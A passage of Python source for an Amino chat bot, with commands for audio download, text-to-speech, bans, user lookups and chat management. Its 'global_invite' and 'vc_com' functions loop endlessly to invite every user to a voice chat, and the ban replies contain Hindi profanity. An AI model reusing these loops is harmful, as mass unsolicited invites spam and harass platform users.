fileType=\"image\")\n\telse:\n\t\tsubClient.send_message(chatId, \"Error! No file\")\n\n\ndef audio(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = os.listdir(path_sound)\n\tprint(\"VAL:\", val)\n\tif val:\n\t\tfile = choice(val)\n\t\tprint(\"File\", file)\n\t\twith suppress(Exception):\n\t\t\twith open(path_sound + \"/\" + file, 'rb') as fp:\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\telse:\n\t\tsubClient.send_message(chatId, \"Error! No file\")\n\n\ndef telecharger(url):\n\tmusic = None\n\tif (\"=\" in url and \"/\" in url and \" \" not in url) or (\"/\" in url\n\t and \" \" not in url):\n\t\tif \"=\" in url and \"/\" in url:\n\t\t\tmusic = url.rsplit(\"=\", 1)[-1]\n\t\telif \"/\" in url:\n\t\t\tmusic = url.rsplit(\"/\")[-1]\n\n\t\tif music in os.listdir(path_sound):\n\t\t\treturn music\n\n\t\tydl_opts = {\n\t\t 'format':\n\t\t 'bestaudio/best',\n\t\t 'postprocessors': [{\n\t\t 'key': 'FFmpegExtractAudio',\n\t\t 'preferredcodec': 'mp3',\n\t\t 'preferredquality': '192',\n\t\t }],\n\t\t 'extract-audio':\n\t\t True,\n\t\t 'outtmpl':\n\t\t f\"{path_download}/{music}.webm\",\n\t\t}\n\n\t\twith YoutubeDL(ydl_opts) as ydl:\n\t\t\tvideo_length = ydl.extract_info(url, download=True).get('duration')\n\t\t\tydl.cache.remove()\n\n\t\turl = music + \".mp3\"\n\n\t\treturn url, video_length\n\treturn False, False\n\n\ndef decoupe(musical, temps):\n\tsize = 170\n\twith open(musical, \"rb\") as fichier:\n\t\tnombre_ligne = len(fichier.readlines())\n\n\tif temps < 180 or temps > 540:\n\t\treturn False\n\n\tdecoupage = int(size * nombre_ligne / temps)\n\n\tt = 0\n\tfile_list = []\n\tfor a in range(0, nombre_ligne, decoupage):\n\t\tb = a + decoupage\n\t\tif b >= nombre_ligne:\n\t\t\tb = nombre_ligne\n\n\t\twith open(musical, \"rb\") as fichier:\n\t\t\tlignes = fichier.readlines()[a:b]\n\n\t\twith open(musical.replace(\".mp3\", \"PART\" + str(t) + \".mp3\"),\n\t\t \"wb\") as mus:\n\t\t\tfor ligne in lignes:\n\t\t\t\tmus.write(ligne)\n\n\t\tfile_list.append(musical.replace(\".mp3\", \"PART\" + str(t) + \".mp3\"))\n\t\tt += 1\n\treturn file_list\n\n\ndef convert(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmusic, size = telecharger(message)\n\tif music:\n\t\tmusic = f\"{path_download}/{music}\"\n\t\tval = decoupe(music, size)\n\n\t\tif not val:\n\t\t\ttry:\n\t\t\t\twith open(music, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\t\t\texcept Exception:\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t \"Error! File too heavy (9 min max)\")\n\t\t\tos.remove(music)\n\t\t\treturn\n\n\t\tos.remove(music)\n\t\tfor elem in val:\n\t\t\twith suppress(Exception):\n\t\t\t\twith open(elem, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\t\t\tos.remove(elem)\n\t\treturn\n\tsubClient.send_message(chatId, \"Error! Wrong link\")\n\n\ndef helper(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif not message:\n\t\tsubClient.send_message(chatId, helpMsg)\n\telif message == \"staff\":\n\t\tsubClient.send_message(chatId, staff)\n\telif message == \"ask\":\n\t\tsubClient.send_message(chatId, helpAsk)\n\telse:\n\t\tsubClient.send_message(chatId, \"No help is available for this command\")\n\n\ndef reboot(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.send_message(chatId, \"Restarting Bot\")\n\t\tos.execv(sys.executable, [\"None\", os.path.basename(sys.argv[0])])\n\n\n\ndef chat_copy(subClient=None, chatId=None, authorId=None, author=None, message=None, messageId=None):\n\tid=client.get_from_code(message). objectId\n\ti=subClient.subclient.get_chat_thread(chatId=id).icon\n\tc=subClient.subclient.get_chat_thread(chatId=id).content\n\tt=subClient.subclient.get_chat_thread(chatId=id).title\n\tbg=subClient.subclient.get_chat_thread(chatId=id).backgroundImage\n\ta=subClient.subclient.get_chat_thread(chatId=id).announcement\n\tsubClient.subclient.edit_chat(chatId=chatId,title=t,content=c,icon=i,announcement=a)\n\tsubClient.subclient.edit_chat(chatId=chatId,backgroundImage=bg)\n\ndef stop(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.send_message(chatId, \"Stopping Bot\")\n\t\tos.execv(sys.executable, [\"None\", \"None\"])\n\n\ndef day(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\ttoday = date.today()\n\t\tG = today.strftime(\"%A\")\n\t\td = time.strftime(\"%b %d %Y \\n %-I:%M %p\")\n\t\tsubClient.send_message(chatId=chatId, message=f\"{G} {d}\")\n\texcept:\n\t\tpass\n\n\ndef uinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\tval2 = \"\"\n\t\tuid = \"\"\n\t\twith suppress(Exception):\n\t\t\tval = subClient.client.get_user_info(message)\n\n\t\twith suppress(Exception):\n\t\t\tval2 = subClient.subclient.get_user_info(message)\n\n\t\tif not val:\n\t\t\tuid = subClient.get_user_id(message)\n\t\t\tif uid:\n\t\t\t\tval = subClient.client.get_user_info(uid[1])\n\t\t\t\tval2 = subClient.subclient.get_user_info(uid[1])\n\t\t\tprint(val, val2)\n\n\t\tif not val:\n\t\t\twith suppress(Exception):\n\t\t\t\tlin = subClient.client.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/u/{message}\"\n\t\t\t\t).json[\"extensions\"][\"linkInfo\"][\"objectId\"]\n\t\t\t\tval = subClient.client.get_user_info(lin)\n\n\t\t\twith suppress(Exception):\n\t\t\t\tval2 = subClient.subclient.get_user_info(lin)\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val.json, sort_keys=True, indent=4))\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson2.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val2.json, sort_keys=True, indent=4))\n\n\t\tfor i in (\"elJson.json\", \"elJson2.json\"):\n\t\t\tif os.path.getsize(i):\n\t\t\t\ttxt2pdf.callPDF(i, \"result.pdf\")\n\t\t\t\tpages = convert_from_path('result.pdf', 150)\n\t\t\t\tfile = 'result.jpg'\n\t\t\t\tfor page in pages:\n\t\t\t\t\tpage.save(file, 'JPEG')\n\t\t\t\t\twith open(file, 'rb') as fp:\n\t\t\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t\t\t file=fp,\n\t\t\t\t\t\t fileType=\"image\")\n\t\t\t\t\tos.remove(file)\n\t\t\t\tos.remove(\"result.pdf\")\n\n\t\tif not os.path.getsize(\"elJson.json\") and not os.path.getsize(\n\t\t \"elJson.json\"):\n\t\t\tsubClient.send_message(chatId, \"Error!\")\n\n\ndef cinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\twith suppress(Exception):\n\t\t\tval = subClient.client.get_from_code(message)\n\n\t\twith suppress(Exception):\n\t\t\twith open(\"elJson.json\", \"w\") as file_:\n\t\t\t\tfile_.write(dumps(val.json, sort_keys=True, indent=4))\n\n\t\tif os.path.getsize(\"elJson.json\"):\n\t\t\ttxt2pdf.callPDF(\"elJson.json\", \"result.pdf\")\n\t\t\tpages = convert_from_path('result.pdf', 150)\n\t\t\tfor page in pages:\n\t\t\t\tfile = 'result.jpg'\n\t\t\t\tpage.save(file, 'JPEG')\n\t\t\t\twith open(file, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tos.remove(file)\n\t\t\tos.remove(\"result.pdf\")\n\n\t\tif not os.path.getsize(\"elJson.json\"):\n\t\t\tsubClient.send_message(chatId, \"Error!\")\n\n\ndef sendinfo(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif (is_it_admin(authorId) or is_it_me(authorId)) and message != \"\":\n\t\targuments = message.strip().split()\n\t\tfor eljson in ('elJson.json', 'elJson2.json'):\n\t\t\tif Path(eljson).exists():\n\t\t\t\targ = arguments.copy()\n\t\t\t\twith open(eljson, 'r') as file:\n\t\t\t\t\tval = load(file)\n\t\t\t\ttry:\n\t\t\t\t\tmemoire = val[arg.pop(0)]\n\t\t\t\texcept Exception:\n\t\t\t\t\tsubClient.send_message(chatId, 'Wrong key!')\n\t\t\t\tif arg:\n\t\t\t\t\tfor elem in arg:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmemoire = memoire[str(elem)]\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tsubClient.send_message(chatId, 'Wrong key 1!')\n\t\t\t\tsubClient.send_message(chatId, memoire)\n\n\ndef get_global(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n mention = subClient.get_message_info(chatId=chatId, messageId=messageId).mentionUserIds\n for user in mention:\n AId = client.get_user_info(userId=str(user)).aminoId\n subClient.send_message(chatId,\n\t\t message=\"https://aminoapps.com/u/\" + str(AId))\n\n\ndef follow(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.follow_user(authorId)\n\tsubClient.send_message(chatId, \"Now following you!\")\n\n\ndef unfollow(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.unfollow_user(authorId)\n\tsubClient.send_message(chatId, \"Unfollow!\")\n\n\ndef stop_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.stop_instance()\n\t\tdel communaute[subClient.community_id]\n\n\ndef block(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n mention = subClient.get_message_info(chatId=chatId, messageId=messageId).mentionUserIds\n for user in mention:\n subClient.client.block(str(user))\n subClient.send_message(chatId,\" blocked!\")\n\n\ndef unblock(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = subClient.client.get_blocked_users()\n\t\tfor aminoId, userId in zip(val.aminoId, val.userId):\n\t\t\tif message in aminoId:\n\t\t\t\tsubClient.client.unblock(userId)\n\t\t\t\tsubClient.send_message(chatId, f\"User {aminoId} unblocked!\")\n\n\ndef accept(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tval = subClient.subclient.get_notices(start=0, size=25)\n\t\tans = None\n\t\tres = None\n\t\tif subClient.accept_role(\"host\", chatId):\n\t\t\tsubClient.send_message(chatId, \"Accepted!\")\n\t\t\treturn\n\n\t\tfor elem in val:\n\t\t\tif 'become' in elem['title'] or \"host\" in elem['title']:\n\t\t\t\tres = elem['noticeId']\n\t\t\tif res:\n\t\t\t\tans = subClient.accept_role(res)\n\t\t\tif ans:\n\t\t\t\tsubClient.send_message(chatId, \"Accepted!\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, \"Error!\")\n\n\ndef hh(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.subclient.accept_organizer(chatId)\n\tsubClient.send_message(chatId, \"accept\")\n\n\ndef say(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\taudio_file = f\"{path_download}/ttp{randint(1,500)}.mp3\"\n\tlangue = list(lang.tts_langs().keys())\n\tif not message:\n\t\tmessage = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=2).content[1]\n\tgTTS(text=message, lang='en', slow=False).save(audio_file)\n\ttry:\n\t\twith open(audio_file, 'rb') as fp:\n\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"audio\")\n\texcept Exception:\n\t\tsubClient.send_message(chatId, \"Too heavy!\")\n\tos.remove(audio_file)\n\n\ndef ask_thing(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tlvl = \"\"\n\t\tboolean = 1\n\t\tif \"lvl=\" in message:\n\t\t\tlvl = message.rsplit(\"lvl=\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl=\" + lvl, \"\").strip()\n\t\telif \"lvl<\" in message:\n\t\t\tlvl = message.rsplit(\"lvl<\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl<\" + lvl, \"\").strip()\n\t\t\tboolean = 2\n\t\telif \"lvl>\" in message:\n\t\t\tlvl = message.rsplit(\"lvl>\", 1)[1].strip().split(\" \", 1)[0]\n\t\t\tmessage = message.replace(\"lvl>\" + lvl, \"\").strip()\n\t\t\tboolean = 3\n\t\ttry:\n\t\t\tlvl = int(lvl)\n\t\texcept ValueError:\n\t\t\tlvl = 20\n\n\t\tsubClient.ask_all_members(\n\t\t message +\n\t\t f\"\\n[CUI]This message was sent by {author}\\n[CUI]I am a bot and have a nice day^^\",\n\t\t lvl, boolean)\n\t\tsubClient.send_message(chatId, \"Asking...\")\n\n\ndef new_mention_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ti = 0\n\tcount = 0\n\tbreakflag = 0\n\tmes = \"\"\n\tuserar = []\n\twhile True:\n\t\tusers = subClient.subclient.get_chat_users(chatId=chatId,\n\t\t start=i,\n\t\t size=100)\n\t\tprint(\"users\", users.nickname)\n\t\tj = 0\n\t\tfor j in range(100):\n\t\t\ttry:\n\t\t\t\tmes = mes + f\"‎‏‎‏@{users.nickname[j]}\\n\"\n\t\t\t\tuserar.append(users.userId[j])\n\t\t\t\tcount += 1\n\t\t\t\tprint(\"mess\", mes)\n\t\t\texcept IndexError:\n\t\t\t\tbreakflag = 1\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\ti += 100\n\t\tif breakflag == 1:\n\t\t\tbreak\n\n\tuserar = [\n\t userId\n\t for userId in subClient.subclient.get_chat_users(chatId=chatId).userId\n\t]\n\tsubClient.send_message(chatId=chatId, message=mes, mentionUserIds=userar)\n\n\ndef ask_staff(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tamino_list = client.sub_clients()\n\t\tfor commu in amino_list.comId:\n\t\t\tcommunaute[commu].ask_amino_staff(message=message)\n\t\tsubClient.send_message(chatId, \"Asking...\")\n\n\ndef bot_clear(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\n\tif (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tprint(\"clearing\")\n\t\tsize = 1\n\t\tmsg = \"\"\n\t\tval = \"\"\n\t\tsubClient.delete_message(chatId, messageId)\n\t\tif \"chat=\" in message and (is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\twith suppress(Exception):\n\t\t\tsize = int(message.strip().split(' ').pop())\n\t\t\tmsg = ' '.join(message.strip().split(' ')[:-1])\n\n\t\tif size > 50 and not is_it_me(authorId):\n\t\t\tsize = 50\n\n\t\tif msg:\n\t\t\ttry:\n\t\t\t\tval = subClient.get_user_id(msg)\n\t\t\texcept Exception:\n\t\t\t\tval = \"\"\n\n\t\tmessages = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=size)\n\t\t# print(\"clearing\")\n\t\tfor message, authorId in zip(messages.messageId,\n\t\t messages.author.userId):\n\t\t\tif not val:\n\t\t\t\tif authorId == botId:\n\t\t\t\t\tsubClient.delete_message(chatId, message)\n\t\t\telif authorId == val[1]:\n\t\t\t\tsubClient.delete_message(chatId, message)\n\n\ndef prefix(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif message:\n\t\tsubClient.set_prefix(message)\n\t\tsubClient.send_message(chatId, f\"prefix set as {message}\")\n\n\ndef lock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message or message in subClient.locked_command or message in (\n\t\t \"lock\", \"unlock\"):\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.add_locked_command(message)\n\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef unlock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif message:\n\t\t\ttry:\n\t\t\t\tmessage = message.lower().strip().split()\n\t\t\texcept Exception:\n\t\t\t\tmessage = [message.lower().strip()]\n\t\t\tsubClient.remove_locked_command(message)\n\t\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef locked_command_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = \"\"\n\tif subClient.locked_command:\n\t\tfor elem in subClient.locked_command:\n\t\t\tval += elem + \"\\n\"\n\telse:\n\t\tval = \"No locked command\"\n\tsubClient.send_message(chatId, val)\n\n\ndef admin_lock_command(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tif not message or message not in commands_dict.keys(\n\t\t) or message == \"alock\":\n\t\t\treturn\n\n\t\tcommand = subClient.admin_locked_command\n\t\tmessage = [message]\n\n\t\tif message[0] in command:\n\t\t\tsubClient.remove_admin_locked_command(message)\n\t\telse:\n\t\t\tsubClient.add_admin_locked_command(message)\n\n\t\tsubClient.send_message(chatId, \"Locked command list updated\")\n\n\ndef locked_admin_command_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = \"\"\n\t\tif subClient.admin_locked_command:\n\t\t\tfor elem in subClient.admin_locked_command:\n\t\t\t\tval += elem + \"\\n\"\n\t\telse:\n\t\t\tval = \"No locked command\"\n\t\tsubClient.send_message(chatId, val)\n\n\ndef read_only(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.only_view\n\t\tif chatId not in chats:\n\t\t\tsubClient.add_only_view(chatId)\n\t\t\tsubClient.send_message(chatId,\n\t\t\t \"This chat is now in only-view mode\")\n\t\telse:\n\t\t\tsubClient.remove_only_view(chatId)\n\t\t\tsubClient.send_message(chatId,\n\t\t\t \"This chat is no longer in only-view mode\")\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef keep_favorite_users(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tusers = subClient.favorite_users\n\t\ttry:\n\t\t\tval = subClient.get_user_id(message)\n\t\t\tuser, userId = val[0], val[1]\n\t\texcept Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, user not found!\")\n\t\t\treturn\n\t\tif userId not in users:\n\t\t\tsubClient.add_favorite_users(userId)\n\t\t\tsubClient.send_message(chatId, f\"Added {user} to favorite users\")\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.favorite(time=1, userId=userId)\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef profile(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmention = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId).mentionUserIds\n\tprint(\"mention\", mention)\n\tfor user in mention:\n\t\tgg = subClient.subclient.get_user_info(userId=str(user)).icon\n\t\tu = subClient.subclient.get_user_info(userId=str(user)).mediaList\n\t\tfor mediaList in u:\n\t\t\tfor L in mediaList:\n\t\t\t\tif L != None and L != 100 and len(L):\n\t\t\t\t\tfor image in gg, L:\n\t\t\t\t\t\tprint(image)\n\t\t\t\t\t\tfilename = image.split(\"/\")[-1]\n\t\t\t\t\t\tfiletype = image.split(\".\")[-1]\n\t\t\t\t\t\tfiletype = filetype.replace(\" \", \"\")\n\t\t\t\t\t\t# print(\"filetype\",filetype)\n\t\t\t\t\t\tif filetype != \"gif\":\n\t\t\t\t\t\t\tfiletype = \"image\"\n\t\t\t\t\t\turllib.request.urlretrieve(image, filename)\n\t\t\t\t\t\twith open(filename, 'rb') as fp:\n\t\t\t\t\t\t\twith suppress(Exception):\n\t\t\t\t\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t\t\t\t\t file=fp,\n\t\t\t\t\t\t\t\t fileType=filetype)\n\t\t\t\t\t\t\t\tprint(os.remove(filename))\n\n\ndef edit_icon(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tdata = subClient.get_message_info(chatId=chatId, messageId=messageId)\n\t\treply_message = data.json['extensions']\n\t\tif reply_message:\n\t\t\timage = data.json['extensions']['replyMessage']['mediaValue']\n\t\t\tfor i in range(1, 5):\n\t\t\t\tsubClient.edit_profile(icon=image)\n\n\t\tsubClient.send_message(chatId, message=\"Done\")\n\n\ndef edit_bio(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.edit_profile(content=message)\n\t\tsubClient.send_message(chatId, f\"Bio changed to {message} by {author}\")\n\n\ndef edit_name(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tsubClient.edit_profile(nickname=message)\n\t\tsubClient.send_message(chatId,\n\t\t f\"Name changed to {message} by {author}\")\n\n\ndef ban(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tmention = subClient.get_message_info(\n\t\t chatId=chatId, messageId=messageId).mentionUserIds\n\t\tfor user in mention:\n\t\t\tsubClient.ban(userId=str(user), reason=f\"{author}:{message}\")\n\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\ttry:\n\t\t\tsubClient.send_message(chatId, message=\"Hogya lodu ban\")\n\t\texcept Exception:\n\t\t\tsubClient.send_message(\n\t\t\t chatId,\n\t\t\t \"Error Bhosdike check kr leader ko to nahi kar raha ban\")\n\n\ndef unkeep_favorite_users(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tusers = subClient.favorite_users\n\t\ttry:\n\t\t\tval = subClient.get_user_id(message)\n\t\t\tuser, userId = val[0], val[1]\n\t\texcept Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, user not found!\")\n\t\t\treturn\n\t\tif userId in users:\n\t\t\tsubClient.remove_favorite_users(userId)\n\t\t\tsubClient.send_message(chatId, f\"Removed {user} to favorite users\")\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.unfavorite(userId=userId)\n\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef keep_favorite_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.favorite_chats\n\t\tval = subClient.get_chats()\n\n\t\tfor title, chatId in zip(val.title, val.chatId):\n\t\t\tif message == title and chatId not in chats:\n\t\t\t\tsubClient.add_favorite_chats(chatId)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Added {title} to favorite chats\")\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.favorite(time=1, chatId=chatId)\n\t\t\t\treturn\n\n\t\tfor title, chatId in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower() and chatId not in chats:\n\t\t\t\tsubClient.add_favorite_chats(chatId)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Added {title} to favorite chats\")\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.favorite(time=1, chatId=chatId)\n\t\t\t\treturn\n\telif not subClient.is_in_staff(botId):\n\t\tsubClient.send_message(chatId, \"The bot need to be in the staff!\")\n\n\ndef vc_com(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tinfo = client.get_from_code(message).objectId\n\tnm = 0\n\tc = 0\n\twhile True:\n\t\ttry:\n\t\t\taa = subClient.subclient.get_all_users(start=nm, size=1)\n\t\t\tfor userId, nickname in zip(aa.profile.userId,\n\t\t\t aa.profile.nickname):\n\t\t\t\tsubClient.subclient.invite_to_vc2(userId=userId,\n\t\t\t\t chatId=info,\n\t\t\t\t comId='x34240648')\n\t\t\t\tnm = nm + 1\n\t\t\t\tc = int(c + 1)\n\t\t\t\tprint(nickname + 'invited')\n\t\t\t\tif nm == 1000:\n\t\t\t\t\tnm = 0\n\t\texcept:\n\t\t\tnm = nm + 1\n\n\ndef unkeep_favorite_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.favorite_chats\n\t\tval = subClient.get_chats()\n\n\t\tfor title, chatid in zip(val.title, val.chatId):\n\t\t\tif message == title and chatid in chats:\n\t\t\t\tsubClient.remove_favorite_chats(chatid)\n\t\t\t\tsubClient.unfavorite(chatId=chatid)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Removed {title} to favorite chats\")\n\t\t\t\treturn\n\n\t\tfor title, chatid in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower() and chatid in chats:\n\t\t\t\tsubClient.remove_favorite_chats(chatid)\n\t\t\t\tsubClient.unfavorite(chatId=chatid)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Removed {title} to favorite chats\")\n\t\t\t\treturn\n\n\ndef global_invite(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tnm = 0\n\tc = 0\n\twhile True:\n\t\ttry:\n\t\t\taa = client.get_all_users(start=nm, size=1)\n\t\t\tfor userId, nickname in zip(aa.profile.userId,\n\t\t\t aa.profile.nickname):\n\t\t\t\tsubClient.subclient.invite_to_vc2(userId=userId,\n\t\t\t\t chatId=chatId,\n\t\t\t\t comId='x34240648')\n\t\t\t\tnm = nm + 1\n\t\t\t\tc = int(c + 1)\n\t\t\t\tprint(nickname + 'invited to a voice chat')\n\t\t\t\tif nm == 1000:\n\t\t\t\t\tnm = 0\n\n\t\texcept:\n\t\t\tnm = nm + 1\n\n\ndef pvp(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmsg = message + \" null null \"\n\tmsg = msg.split(\" \")\n\ttry:\n\t\trounds = int(msg[0])\n\texcept (TypeError, ValueError):\n\t\trounds = 5\n\t\tmsg[2] = msg[1]\n\t\tmsg[1] = msg[0]\n\t\tmsg[0] = 5\n\tsubClient.send_message(chatId=chatId,\n\t message=f\"fighting {msg[1]} e {msg[2]}...\")\n\twin1 = 0\n\twin2 = 0\n\tround = 0\n\tagess = ''\n\tdefens = ''\n\tfor pvp in range(0, rounds):\n\t\tround = round + 1\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[bc]Round {round}/{rounds}\")\n\t\tpunch = randint(0, 1)\n\t\tif punch == 0:\n\t\t\twin1 = win1 + 1\n\t\t\tagress = msg[1]\n\t\t\tdefens = msg[2]\n\t\telse:\n\t\t\twin2 = win2 + 1\n\t\t\tagress = msg[2]\n\t\t\tdefens = msg[1]\n\t\ttime.sleep(4)\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[ic] {agress} winner°° {defens}!\")\n\tif win1 > 